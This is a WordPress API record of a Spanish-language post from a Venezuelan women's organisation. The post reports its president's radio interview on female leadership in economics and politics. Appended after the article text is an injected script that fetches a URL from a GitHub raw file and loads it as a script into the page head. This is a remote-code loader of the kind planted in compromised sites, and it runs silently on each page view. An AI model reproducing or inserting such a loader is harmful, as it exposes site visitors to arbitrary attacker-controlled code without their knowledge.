{"id":3791,"date":"2023-09-04T10:04:30","date_gmt":"2023-09-04T14:34:30","guid":{"rendered":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3791"},"modified":"2024-07-25T05:17:30","modified_gmt":"2024-07-25T09:47:30","slug":"adela-vivas-analiza-el-liderazgo-femenino-en-el-programa-buenas-tardes-en-onda-la-superestacion","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3791","title":{"rendered":"Adela Vivas analiza el Liderazgo Femenino en el programa Buenas Tardes en Onda La Superestaci\u00f3n"},"content":{"rendered":"<p style=\"text-align: justify;\"><img loading=\"lazy\" class=\"alignleft wp-image-3792 \" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2023\/09\/Post-ADELA-VIVAS-e1695222253538-276x300.png\" alt=\"\" width=\"214\" height=\"232\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2023\/09\/Post-ADELA-VIVAS-e1695222253538-276x300.png 276w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2023\/09\/Post-ADELA-VIVAS-e1695222253538.png 290w\" sizes=\"(max-width: 214px) 100vw, 214px\" \/>En una reciente entrevista en el programa <strong>Buenas Tardes<\/strong>, en <em><strong>Onda La Superestaci\u00f3n 107.9 FM<\/strong><\/em> nuestra Presidenta <strong>Adela Vivas<\/strong> tuvo la oportunidad de conversar con la reconocida periodista <strong>Lila Vanorio<\/strong> y el destacado profesor <strong>Rafael Arraiz Lucca<\/strong>, en un interesante di\u00e1logo sobre el <strong>liderazgo femenino en \u00e1mbitos econ\u00f3micos y pol\u00edticos.<\/strong><\/p>\n<p style=\"text-align: justify;\">Durante la entrevista, nuestra Presidenta destac\u00f3 la importancia de promover y fortalecer la participaci\u00f3n de las mujeres en puestos de liderazgo en estos dos sectores clave de nuestra sociedad. <strong>Adela Vivas<\/strong> resalt\u00f3 que el liderazgo femenino aporta una perspectiva \u00fanica y valiosa, capaz de generar cambios significativos no solo a nivel individual, sino tambi\u00e9n a nivel colectivo.<\/p>\n<p style=\"text-align: justify;\">En cuanto al \u00e1mbito econ\u00f3mico, nuestra Presidenta subray\u00f3 la necesidad de fomentar la<strong> equidad de g\u00e9nero en las empresas y organizaciones,<\/strong> tanto a nivel de empleados como de cargos directivos. <strong>Adela Vivas<\/strong> hizo hincapi\u00e9 en que el talento y las habilidades de las mujeres son fundamentales para el crecimiento y el desarrollo sostenible de nuestras econom\u00edas.<\/p>\n<p style=\"text-align: justify;\">En relaci\u00f3n al \u00e1mbito pol\u00edtico, <strong>Adela Vivas<\/strong> hizo referencia a los avances significativos que se han logrado en materia de representaci\u00f3n femenina en los \u00faltimos a\u00f1os, pero tambi\u00e9n remarc\u00f3 que a\u00fan existen desaf\u00edos por superar. Nuestra Presidenta inst\u00f3 a la creaci\u00f3n de pol\u00edticas inclusivas que promuevan la participaci\u00f3n activa de las mujeres en la toma de decisiones y en la formulaci\u00f3n de pol\u00edticas p\u00fablicas.<\/p>\n<p style=\"text-align: justify;\">En resumen, la participaci\u00f3n de nuestra Presidenta Adela Vivas en el programa Buenas Tardes fue una oportunidad para resaltar la importancia del<strong> liderazgo femenino en los \u00e1mbitos econ\u00f3micos y pol\u00edticos<\/strong>. Su compromiso con la<strong> equidad de g\u00e9nero y su visi\u00f3n de un futuro m\u00e1s igualitario<\/strong> son ejemplos a seguir, tanto para mujeres como para hombres, en la construcci\u00f3n de una sociedad m\u00e1s justa y equitativa.<\/p>\n<p style=\"text-align: justify;\">En est\u00e9 enlace podr\u00e1s disfrutar de esta maravillosa entrevista:\u00a0 <a href=\"https:\/\/www.youtube.com\/watch?v=p5CapulWsgY\">https:\/\/www.youtube.com\/watch?v=p5CapulWsgY<\/a><\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En una reciente entrevista en el programa Buenas Tardes, en Onda La Superestaci\u00f3n 107.9 FM nuestra Presidenta Adela Vivas tuvo la oportunidad de conversar con la reconocida periodista Lila Vanorio y el destacado profesor Rafael Arraiz Lucca, en un interesante&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3791\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[542,129,1,16],"tags":[],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3791"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3791"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3791\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3792"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3791"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}